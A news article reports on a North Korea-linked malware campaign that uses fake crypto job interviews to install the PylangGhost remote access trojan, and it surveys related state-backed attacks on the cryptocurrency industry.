North Korean Malware Campaign Targets Cryptocurrency Professionals

A newly uncovered malware campaign linked to North Korea is targeting blockchain and cryptocurrency professionals with a powerful Remote Access Trojan (RAT) called PylangGhost.

According to Cisco Talos, the group behind the attack, known as “Famous Chollima” or Wagemole, is using fake job listings to lure victims. These listings impersonate trusted crypto companies such as Coinbase, Robinhood, and Uniswap, drawing in job seekers with remote development roles.

Fake Interviews Turn Into Full-System Breaches

Once candidates apply, they are directed to a counterfeit recruitment site for a skills test. They are then scheduled for a fake video interview where they are asked to enable their camera and microphone.

During the call, attackers instruct them to run command-line commands, falsely claiming it’s to install video drivers. In reality, these commands silently install PylangGhost, giving the hackers full access to the victim’s device.

The PylangGhost malware harvests cookies and login credentials from over 80 browser extensions, including MetaMask, 1Password, Phantom, NordPass, TronLink, and Bitski. It also captures screenshots, extracts system files, gathers device information, and ensures long-term access.

The attackers’ aim is twofold. The first goal is to steal credentials from their victims and possibly financial data, while the second target is to infiltrate real companies by planting fake employees, enabling long-term access to confidential data or software architecture of these firms.

These attacks primarily target professionals in India, capitalizing on the high demand for blockchain talent and the widespread adoption of remote work in the industry.

The Real Crypto Threat? Governments Exploiting the Industry

The PylangGhost campaign is just one part of a broader trend involving highly targeted cyberattacks by North Korean actors against the cryptocurrency industry.

Pyongyang uses these schemes to fund its nuclear and ballistic missile programs.

As previously reported on EconomyWatch, North Korea-linked hackers were responsible for approximately 61% of all crypto thefts worldwide in 2024.

Previous campaigns included Zoom calls with fake venture capitalists, during which attackers triggered audio glitches to convince victims to install malware disguised as software updates.

North Korean groups, such as BlueNoroff, have taken this further by using deepfake video calls to impersonate high-level executives and trick crypto founders, especially those using macOS, into executing malicious instructions.

Shell companies, such as Blocknovas LLC, Softglide LLC, and Angeloper Agency, have also played a role, luring developers into running crypto malware, including BeaverTail and InvisibleFerret. Despite Blocknovas being taken down by the FBI, other fronts remain active, proving the adaptability of these operations.

https://twitter.com/AkwyZ/status/1935632903200731399

These attacks aren’t limited to North Korea. In Iran, a $90 million hack on Nobitex by pro-Israeli operatives led the government to impose new restrictions on crypto exchanges. These incidents underscore the need for constant vigilance, secure authentication, and routine system audits.

As the threat landscape evolves, the most significant danger to the crypto world is no longer just market volatility. It’s gradually shifting towards highly organized global cybercrime.